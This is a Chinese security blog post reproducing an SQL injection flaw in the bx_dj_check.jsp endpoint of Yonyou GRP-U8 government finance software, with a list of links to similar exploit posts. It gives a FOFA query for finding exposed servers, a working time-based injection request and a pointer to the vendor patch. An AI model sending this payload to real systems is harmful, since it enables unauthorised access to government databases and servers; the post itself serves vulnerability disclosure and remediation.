【漏洞复现】用友 GRP-U8 bx_dj_check.jsp Sql注入漏洞

于 2024-09-13 10:40:58 发布
阅读量557 收藏 7
点赞数 10
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142204453
版权

1 产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件

2 漏洞概述

用友GRP-U8R10行政事业内控管理软件 bx_dj_check.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。

3 影响范围

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。

4 复现环境

FOFA:

app="用友-GRP-U8"

5 漏洞复现

PoC

GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

sqlmap验证

6 修复建议


加固补丁通过过滤特殊SQL关键字、增加预编译,防止通过入参进行SQL注入。请所有渠道总经理、技术支持部,联动向下传达到客户和沟通群。

补丁名称:20230713-关于用友GRP-U8中u8qx下SelectDMJE.jsp及bx_dj_check.jsp存在SQL注入漏洞的解决方案.zip

可在公告《关于用友GRP-U8内控管理软件存在SQL(u8qx\SelectDMJE.jsp)注入漏洞的安全通告》里面下载。

 

 

天官赐福万无禁忌
关注
专栏目录
用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
0xSec
01-30 529
用友GRP-U8R10行政事业内控管理软件forgetPassword_old.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 bx_dj_check.jsp SQL注入漏洞复现(XVE-2024-10537)
qq_39894062的博客
05-15 686
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友GRP-U8 forgetPassword_old.jspSQL注入(附漏洞利用脚本)
jjjj1029056414的博客
01-31 564
用友GRP-U8 forgetPassword_old.jspSQL注入,附带自己写的poc脚本
1day 用友GRP-U8 bx_dj_check 存在SQL注入
渗透安全Sec
05-17 404
1day、漏洞复现用友GRP-U8 bx_dj_check 存在SQL注入
漏洞情报-用友 GRP-U8 SQL 注入漏洞
最新发布
2301_77012231的博客
08-10 285
用友 GRP-U8 是一款功能强大的财务管理软件,可以帮助企业快速、准确地进行财务核算和资金管理。用友 GRP-U8 存在多个SQL注入漏洞。2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。1、如⾮必要,禁⽌公⽹访问该系统。3、升级产品到最新版本。可以getshell。
漏洞复现用友 GRP-U8 bx_historyDataCheck.jsp Sql注入漏洞
alert['Hello World']
07-21 257
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。用友 GRP-U8 bx_historyDataCheck.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限
用友GRP-U8 bx_dj_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10537)
0xSec
05-14 362
用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。
用友GRP-U8 dialog_moreUser_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10610)
0xSec
05-14 440
用友GRP-U8R10行政事业内控管理软件dialog_moreUser_check.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 obr_zdybxd_check.jsp SQL注入漏洞复现(XVE-2024-9322)
0xSec
01-18 468
用友GRP-U8R10行政事业内控管理软件obr_zdybxd_check.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1913
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
1day速达软件NET接口处存在RCE漏洞
weixin_43167326的博客
05-07 856
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
漏洞复现用友GPR-U8 slbmbygr SQL注入漏洞
今天是几号的博客
10-03 1688
在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png。用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。POC:拼接/u8qx/slbmbygr.jsp?使用SQLmap进行注入利用。
漏洞复现用友 GRP-U8 FileUpload 任意文件上传漏洞
alert['Hello World']
06-28 535
用友GRP-U8 FileUpload 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
用友php漏洞,用友GRP-u8 注入-RCE漏洞复现
weixin_29483277的博客
04-10 348
用友GRP-u8 注入-RCE漏洞复现(HW第一时间复现了,当时觉得不合适,现在才发出来)一、漏洞简介用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。二、漏洞复现SQL注入POCPOST /Proxy HTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests: 1User-Agent...
用友U8_bx_historyDataCheck.jsp SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
04-07 159
用友GRP-U8 bx_historyDataCheck.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。接收传参后并未进行任何过滤,从而导致sql注入没有人规定,一朵花,一定要成长为向日葵或者玫瑰。
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1391
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
(新接口)用友GRP-U8多个接口存在SQL 注入漏洞-0day
weixin_43167326的博客
02-22 466
用友GRP-U8用友公司推出的一款企业级管理软件,涵盖财务、人力资源、供应链等多个领域,适用于各类企业。该系统拥有灵活的定制化功能,可根据企业需求进行模块选择和定制开发,满足不同行业的管理需求。用友GRP-U8整合了企业各业务环节,实现信息共享和流程优化,帮助企业提高管理效率,降低成本,提升竞争力。
用友GRP-U8高校内控管理软件 漏洞
07-28
- *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值